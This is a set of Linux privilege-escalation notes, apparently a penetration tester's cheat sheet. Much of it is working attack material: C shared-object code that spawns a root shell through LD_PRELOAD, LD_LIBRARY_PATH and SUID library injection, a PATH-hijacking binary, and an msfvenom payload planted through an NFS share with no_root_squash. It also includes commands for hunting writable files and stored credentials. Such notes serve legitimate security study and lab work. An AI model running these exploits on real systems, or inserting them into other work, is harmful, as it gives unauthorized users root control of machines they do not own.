# Linux Privilege Escalation Techniques
> 16.07.2021  | [notes](https://gitlab.com/be3ru5/notes/-/blob/master/PrivEsc/LinuxNotes.md)
___________

## kernel exploit

```
uname -a
```

## service exploit

```
ps aux | grep '^root'
```

if for some reason, an exploit cannot run locally on the target machine, the port can be forwarded using SSH to your local machine:
```
ssh -R <target-port>:127.0.0.1:<service-port> <username>@<local-machine>
```

## weak file permission

Find all writable files in /etc:
```
find /etc -maxdepth 1 -writable -type f
```

Find all readable files in /etc:
```
find /etc -maxdepth 1 -readable -type f
```

Find all directories which can be written to:
```
find / -executable -writable -type d 2> /dev/null
```

## sudo

```
sudo -l
```

If for some reason the `su` program is not allowed, there are many other
ways to escalate privileges:
```
sudo -s
sudo -i
sudo /bin/bash
```
> -s, --shell :run shell as the target user; a command may also be specified

> -i, --login :run login shell as the target user; a command may also be specified

[**Shell Escape Sequences**](https://gtfobins.github.io/)

Even if we are restricted to running certain programs via sudo, it is sometimes possible to “escape” the program and spawn a shell.

**Environment Variables**

\> **LD_PRELOAD**:

*LD_PRELOAD is an environment variable which can be set to the path of a shared object (.so) file. When set, the shared object will be loaded before any others. By creating a custom shared object and creating an init() function, we can execute code as soon as the object is loaded.*

code: (c)
```
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
	unsetenv("LD_PRELOAD");
	setresuid(0,0,0);
	system("/bin/bash -p");
}
```

compile:
```
gcc -fPIC -shared -nostartfiles -o /tmp/exploit.so exploit.c
```

exploit:
```
sudo LD_PRELOAD=/tmp/exploit.so <any allowed program using sudo>
```

\> **LD_LIBRARY_PATH**:

```
ldd <any allowed program using sudo>
```
choose one from the list and try it

code: (c)
```
#include <stdio.h>
#include <stdlib.h>
static void hijack() __attribute__((constructor));
void hijack() {
	unsetenv("LD_LIBRARY_PATH");
	setresuid(0,0,0);
	system("/bin/bash -p");
}
```

```
gcc -o <selected shared object (.so)> -shared -fPIC exploit.c
```

```
sudo LD_LIBRARY_PATH=. selected program
```

> hijacking shared objects using this method is hit or miss. give some tries if didn't work.

## cron jobs

```
cat /etc/crontab
```

**File Permissions**:

if we can write to a program or script which gets run as part of a cron job, we can replace it with our own code

**PATH Environment Variable**:

if a cron job program/script does not use an absolute path, and one of the PATH directories is writable by our user, we may be able to create a program/script with the same name as the cron job.

default path: `/usr/bin:/bin`

**Wildcards**:

When a wildcard character (\*) is provided to a command as part of an argument, the shell will first perform filename expansion (also known as globbing) on the wildcard.

This process replaces the wildcard with a space-separated list of the file and directory names in the current directory.

Since file systems in Linux are generally very permissive with filenames, and filename expansion happens before the command is executed, it is possible to pass command line options (e.g. -h, --help) to commands by creating files with these names.

[GTFOBins](https://gtfobins.github.io) can help determine whether a command has command line options which will be useful for our purposes.

## SUID/SGID executables

```
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
```

[**Shell Escape Sequences**](https://gtfobins.github.io/)

Just as we were able to use shell escape sequences with programs running via sudo, we can do the same with SUID / SGID files.

**Known Exploit**:

Just as services which run as root can have vulnerabilities we can exploit for a root shell, so too can these SUID files.

**Shared Object Injection**:

When a program is executed, it will try to load the shared objects it
requires.

By using a program called `strace`, we can track these system calls and determine whether any shared objects were not found.

If we can write to the location the program tries to open, we can create a shared object and spawn a root shell when it is loaded.

```
strace <target_SUID> 2>&1 | grep -iE "open|access|no such file"
```

code:
```
#include <stdio.h>
#include <stdlib.h>
static void inject() __attribute__((constructor));
void inject() {
	setuid(0);
	system("/bin/bash -p");
}
```

```
gcc -shared -fPIC -o <target_path>/<target_share_file> exploit.c
```

**PATH Environment Variable**

The PATH environment variable contains a list of directories where the shell should try to find programs.

If a program tries to execute another program, but only specifies the program name, rather than its full (absolute) path, the shell will search the PATH directories until it is found.

Since a user has full control over their PATH variable, we can tell the shell to first look for programs in a directory we can write to.

\> Finding Vulnerable Programs (cont.):

* `strings <path to target_file>`
* `strace -v -f -e execve <path to target_file> 2>&1 | grep exec`
* `ltrace <path to file>`

code:
```
int main() {
	setuid(0);
	system("/bin/bash -p");
}
```

```
gcc -o service exploit.c
```

```
PATH=.:$PATH <path to target_file>
```

## passwords and keys

the root user’s account password is hashed and stored securely in /etc/shadow, other passwords, such as those for services may be stored in plain-text in config files.

* history files
* config files
* ssh keys

## NFS

```
cat /etc/exports
```

`no_root_squash` is an NFS configuration option which turns root squashing off.

when included in a writable share configuration, a remote user who identifies as “root” can create files on the NFS share as the local root user.

confirm that the NFS share is available for remote mounting: `showmount -e <target_IP>`

\> on host:
```
mkdir /tmp/nfs ; mount -o rw,vers=2 <target_IP>:/tmp /tmp/nfs
```

```
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o
/tmp/nfs/exploit.elf ; chmod +xs /tmp/nfs/exploit.elf
```

\> on target:
```
/tmp/exploit.elf
```

[for more help](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
